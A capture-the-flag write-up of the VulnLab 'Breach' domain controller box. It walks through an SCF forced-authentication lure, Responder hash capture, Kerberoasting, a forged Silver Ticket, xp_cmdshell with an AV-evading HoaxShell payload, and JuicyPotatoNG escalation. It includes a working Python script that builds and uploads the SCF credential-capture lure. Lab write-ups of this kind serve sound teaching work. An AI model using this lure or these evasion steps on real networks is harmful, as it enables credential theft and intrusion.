Keypoints :
- Maverick’s testing reveals a robust initial access path.
- A malicious SCF file dropped on a writable SMB share forced Julia.Wong’s machine to authenticate to Responder, which captured her NetNTLMv2 hash; the cracked password was then used for Kerberoasting.
- A Silver Ticket forged with svc_mssql’s NT hash was used to reach MSSQL as a privileged principal and enable xp_cmdshell.
- The AV installed was highly effective at killing reverse shells.
- HoaxShell was employed to bypass AV defenses.
- Tools like smbclient and nxc (netexec) were used to enumerate SMB shares.
- JuicyPotatoNG was used for privilege escalation after identifying SeImpersonatePrivilege.
- BloodHound was employed to map the attack surface and identify Kerberoastable users.
- Kerberos-based attacks (Kerberoasting, Silver Ticket) allowed unauthorized access to services.
- Multiple methods were used for uploading and executing files on the target machine.
MITRE Techniques :
- T1187 – Forced Authentication: an SCF file uploaded to the writable share forced a browsing user’s machine to authenticate to the attacker, and Responder captured Julia.Wong’s NetNTLMv2 response.
- T1110.002 – Brute Force: Password Cracking: the captured NetNTLMv2 response and the Kerberoast TGS hash were cracked offline with John/Hashcat.
- T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting: a TGS for svc_mssql (MSSQLSvc SPN) was requested with Julia’s credentials and cracked.
- T1558.002 – Steal or Forge Kerberos Tickets: Silver Ticket: a service ticket for MSSQL was forged offline with svc_mssql’s NT hash.
- T1550.003 – Use Alternate Authentication Material: Pass the Ticket: the forged ticket was loaded via KRB5CCNAME and used with impacket-mssqlclient.
- T1059.001 – Command and Scripting Interpreter: PowerShell: a HoaxShell PowerShell payload launched through xp_cmdshell bypassed AV.
- T1134.001 – Access Token Manipulation: Token Impersonation/Theft: JuicyPotatoNG abused SeImpersonatePrivilege to escalate privileges.
Indicator of Compromise :
- [IP Address] 10.10.67.132
- [Domain] breach.vl
- [Username] Julia.Wong
- [Username] svc_mssql
- [Hash Type] NetNTLMv2 challenge/response for Julia.Wong captured by Responder (partial, blob truncated): Julia.Wong::BREACH:5a8fd7c86d8a60e7:7F50D2736306C0AC15E302BC44EAC1CE
Full Story: https://infosecwriteups.com/breach-vulnlab-malicious-file-upload-to-smb-kerberoasting-silver-ticket-and-av-shenanigans-dbaf0cb2a72e?source=rss—-7b722bfd1b8d—4
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.67.132 445 BREACHDC [*] Enumerated shares
SMB 10.10.67.132 445 BREACHDC Share Permissions Remark
SMB 10.10.67.132 445 BREACHDC ----- ----------- ------
SMB 10.10.67.132 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.67.132 445 BREACHDC C$ Default share
SMB 10.10.67.132 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.67.132 445 BREACHDC NETLOGON Logon server share
SMB 10.10.67.132 445 BREACHDC share READ,WRITE
SMB 10.10.67.132 445 BREACHDC SYSVOL Logon server share
SMB 10.10.67.132 445 BREACHDC Users READ
SPIDER_PLUS 10.10.67.132 445 BREACHDC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.67.132.json".
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, share, SYSVOL, Users)
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Readable Shares: 3 (IPC$, share, Users)
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Writable Shares: 1 (share)
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] Total folders found: 63
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] Total files found: 67
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] File size average: 27.75 KB
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] File size min: 3 B
SPIDER_PLUS 10.10.67.132 445 BREACHDC [*] File size max: 512 KB
As you can see, there are read and write permissions on “share”, while “Users” and “IPC$” are read-only. A writable share that other users browse is exactly what a forced-authentication lure needs. I logged into “share” and found some juicy stuff, as shown in smbclient. Now, I’ll try uploading a malicious file to the share to capture NTLM hashes.
Attention: In usual AD testing, you should dig deep for users and gather as many as possible to check their validity. This helps with attacks like Kerberoasting, AS-REP roasting, and of course, password spraying. But I won’t do that this time because, as I said before, I’ve already covered it. If you’re not familiar with this, I highly recommend reading my previous write-ups to dive deeper into the process.
Inspired by a ton of articles on this attack, I found a great tool that automates creating the SCF file and uploading it for me. After that, I simply ran Responder to grab those sweet NTLM hashes.
I uploaded the SCF file using a one-liner command and ran Responder to start listening for incoming NTLM hashes. The SCF’s IconFile entry points at a UNC path on my machine, so as soon as a user opens the folder in Explorer their workstation authenticates to Responder with their NetNTLMv2 response; no click is required.
Is this attack familiar to you? 😏 Have you ever done an LLMNR/NBNS poisoning attack before? Oh man, you’re tough! 💪🔥 Responder is the same tool in both cases, but here the authentication is forced by the SCF file rather than by spoofed name resolution.
And here we go with the hash! 🎉 Let’s try cracking it with John (hashcat mode 5600 if you’re feeling fancy). Your call! 😈🔥
After running john --show, we got our creds. Now it’s time to check their validity using netexec, as usual. The creds are valid for SMB, LDAP, and MSSQL, giving us multiple ways to move forward.
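As an added illustration (this is not the author’s one-liner or Responder’s code), here is a small Python helper that builds the SCF lure Explorer will resolve, optionally drops it on the writable share with impacket, and parses the line Responder prints into the fields hashcat -m 5600 and john need. The attacker IP 10.10.14.5, the filename @readme.scf and the share name are assumptions; the sample capture is the truncated one from the IoC list above, which is why the parser has to cope with a missing blob.

```python
# Added example, not code from the original post. Builds the SCF lure,
# optionally uploads it with impacket, and parses the NetNTLMv2 line that
# Responder captures. Attacker IP / share / filename below are assumptions.
import re
from dataclasses import dataclass
from typing import Optional

ATTACKER_IP = "10.10.14.5"      # assumption: your Responder listener
TARGET_SHARE = "share"          # the READ,WRITE share from the netexec output
SCF_NAME = "@readme.scf"        # leading '@' sorts it to the top of the listing


def build_scf(attacker_ip: str, icon_share: str = "share", icon_name: str = "icon.ico") -> bytes:
    """SCF whose IconFile is a UNC path on the attacker.

    Explorer resolves IconFile as soon as the folder is listed, so the user
    browsing the share authenticates to attacker_ip over SMB without
    clicking anything; Responder answers the negotiation and logs the
    NetNTLMv2 response.
    """
    unc = f"\\\\{attacker_ip}\\{icon_share}\\{icon_name}"
    body = ["[Shell]", "Command=2", f"IconFile={unc}", "[Taskbar]", "Command=ToggleDesktop"]
    return ("\r\n".join(body) + "\r\n").encode("ascii")


def upload_scf(host: str, user: str, password: str, domain: str,
               share: str, remote_path: str, content: bytes) -> None:
    """Drop the SCF on the share with impacket (network call, assumed reachable).

    SMBConnection.putFile takes a callback that is handed a size and must
    return the next chunk, so a BytesIO.read fits directly.
    """
    from io import BytesIO
    from impacket.smbconnection import SMBConnection  # lazy: only needed online
    conn = SMBConnection(host, host)
    conn.login(user, password, domain)
    conn.putFile(share, remote_path, BytesIO(content).read)
    conn.logoff()


@dataclass
class NetNTLMv2:
    user: str
    domain: str
    server_challenge: str   # 8 bytes, 16 hex chars
    nt_proof: str           # HMAC-MD5 over the challenge, 32 hex chars
    blob: Optional[str]     # NTLMv2 client blob; None if the capture was cut off

    @property
    def hashcat_ready(self) -> bool:
        """hashcat -m 5600 / john netntlmv2 need every field present."""
        return (self.blob is not None
                and len(self.server_challenge) == 16
                and len(self.nt_proof) == 32)


_HEX = re.compile(r"^[0-9a-fA-F]+$")


def parse_netntlmv2(line: str) -> NetNTLMv2:
    """Parse 'user::DOMAIN:challenge:NTProofStr:blob' as Responder prints it."""
    user, sep, rest = line.strip().partition("::")
    if not sep or not user:
        raise ValueError("not a NetNTLMv2 line: missing 'user::'")
    parts = rest.split(":")
    if len(parts) < 3:
        raise ValueError("need at least DOMAIN:challenge:NTProofStr")
    domain, challenge, proof = parts[:3]
    blob = parts[3] if len(parts) > 3 and parts[3] else None
    for field in filter(None, (challenge, proof, blob)):
        if not _HEX.match(field):
            raise ValueError(f"non-hex field in capture: {field!r}")
    return NetNTLMv2(user, domain, challenge, proof, blob)


if __name__ == "__main__":
    print(build_scf(ATTACKER_IP).decode())
    # Constructed sample: the partial capture quoted in the IoC list above.
    cap = parse_netntlmv2("Julia.Wong::BREACH:5a8fd7c86d8a60e7:7F50D2736306C0AC15E302BC44EAC1CE")
    print(cap, "crackable:", cap.hashcat_ready)
```

Feed a complete capture line unchanged to hashcat -m 5600 (or john --format=netntlmv2); the hashcat_ready check exists because a cut-off line, like the one quoted in the IoC list, loads as garbage or not at all.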
Now, there are two things we should do:
- Run BloodHound with these creds to map out the attack surface and see what opportunities we have.
- Think like an attacker — dig deeper with a breach mindset, just like in a real engagement.
But if you just want the flag? 🤔 Simply run netexec with -M spider_plus, and in the share’s transfer\julia.wong folder you’ll find local.txt, aka the user.txt flag.
Running BloodHound to See Attack Surface
After running BloodHound, I spotted a Kerberoastable user: svc_mssql. You can also find this manually with impacket-GetUserSPNs or with netexec, and this time netexec did it for us automatically.
When I checked Julia’s creds with netexec it also handed me the Kerberoast hash (the ldap protocol’s --kerberoasting option). But just for you, bruh, I’ll use impacket-GetUserSPNs to get it as well. 😏
As BloodHound showed, svc_mssql has a service SPN registered (MSSQLSvc), so any authenticated domain user can request a TGS for it, encrypted with the account’s key, and crack it offline. Alright, let’s crack this hash with Hashcat (mode 13100 for an RC4 TGS-REP) and see what we get!
As I mentioned before, if you log in to MSSQL with Julia’s creds you can’t run xp_cmdshell, and even with svc_mssql’s creds you still can’t: neither login has the rights. To get around this, you need to forge a Silver Ticket first.
A Silver Ticket is a Kerberos attack in which you forge a service ticket (TGS) rather than a TGT. The ticket is encrypted with the service account’s own key, so you can build it offline and present it straight to the service without ever talking to the KDC; the domain controller logs no 4768/4769 for it, which is what makes it quieter than a Golden Ticket. It does not work “without credentials”: you need the service account’s secret, and here that is svc_mssql’s password recovered from Kerberoasting, from which the NT hash (or AES key) is derived. The part that matters for us is the PAC. Since we write it ourselves, the ticket can claim to be Administrator (RID 500) with domain-admin group memberships, and MSSQL, which does not validate the PAC with the DC, trusts those claims. That gives us a login with enough rights to enable xp_cmdshell, and from there we drop a reverse shell. On the defensive side, the DC never sees this ticket; the evidence lives on the SQL host (a Kerberos 4624 logon for a principal that never obtained a TGT), and rotating svc_mssql’s password invalidates every ticket forged with the old key.
How to Craft a Silver Ticket
1️⃣ Get the Domain SID
2️⃣ Extract the NTLM Hash of the Target User
3️⃣ Find the Service Principal Name (SPN)
4️⃣ Forge the Silver Ticket using impacket-ticketer
5️⃣ Pass the Ticket to the Target System
6️⃣ Access the Target Service with Elevated Permissions
1️⃣ Get the Domain SID with impacket-lookupsid using Julia’s creds. Take the domain SID it prints, not a user’s SID with a RID appended.
2️⃣ User NTLM Hash: I just fed the plaintext password for svc_mssql to an NTLM hash generator. The NT hash is MD4 over the UTF-16LE password, so any offline generator gives the same value (impacket-ticketer also accepts an AES key via -aesKey if you prefer).
3️⃣ Service Principal Name (SPN): impacket-GetUserSPNs, just like for Kerberoasting, lists the MSSQLSvc SPN registered on svc_mssql.
Now, let’s put everything together using impacket-ticketer to forge the TGS ticket.
After running impacket-ticketer, I passed the ticket by exporting KRB5CCNAME to point at the generated .ccache file, connected with impacket-mssqlclient -k, and voilà: now we have the privilege to enable xp_cmdshell.
Okay, bro, now what we need is very simple — just run a PowerShell reverse shell from impacket-mssqlclient after enabling xp_cmdshell.
But at this stage, it was tough because AV blocked the malicious PowerShell reverse shell. You could use any implant from a C2 framework like Havoc or Sliver, but I chose the easy way. So, I ran HoaxShell, which provided an evasive PowerShell payload to bypass AV. 🔥 HoaxShell talks to its listener over HTTP(S) instead of opening a raw TCP socket back, which is a large part of why the stock one-liner was killed and this one survived.
And here we go! 🚀 Now, we need some situational awareness.
You can upload WinPEAS, Seatbelt, Windows Privilege Checker, or any privilege escalation tool you prefer. But first, let’s check what privileges we already have! 🔍
After running whoami /all, I saw that we have SeImpersonatePrivilege. To abuse this, we can use any Potato exploit… but did you forget about the AV? 🤡 LOL, it will kill your payloads, just like it did to mine!
Anyway, let me walk you through exactly what I did:
1️⃣ Transferred JuicyPotatoNG and an evasive build of nc (NetCat64, see the references) to the box.
2️⃣ Set up the listener, and we’re ready to roll! 🚀
To transfer both files I used a simple PowerShell download command on the target. And of course, you can use any method to transfer files, there are a ton of ways; impacket-smbserver works as well.
Once transferred, it was time to run JuicyPotatoNG with nc as the program to launch and escalate privileges! 🔥🚀
🛡️ Defense & Remediation Strategies 🛡️
References
- SMB SCF File Attack: https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
- NetCat64: https://github.com/vinsworldcom/NetCat64
- JuicyPotatoNG v1.1: https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1
- Giving JuicyPotato a Second Chance: https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/
- HoaxShell: https://github.com/t3l3machus/hoaxshell
- MSSQL for Pentesters (xp_cmdshell Execution): https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
- Windows Privilege Escalation (Potatoes Collection): https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Making nc.exe Viable Again (Bypassing Defender): https://steve-s.gitbook.io/0xtriboulet/deceiving-defender/deceiving-defender-making-nc.exe-viable-again
- Kerberos Tickets (Swissky’s Guide): https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-tickets/
- Silver & Golden Ticket Attacks: https://en.hackndo.com/kerberos-silver-golden-tickets/
Do You Wanna Chat with Maverick?🥂
Don’t forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! I love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀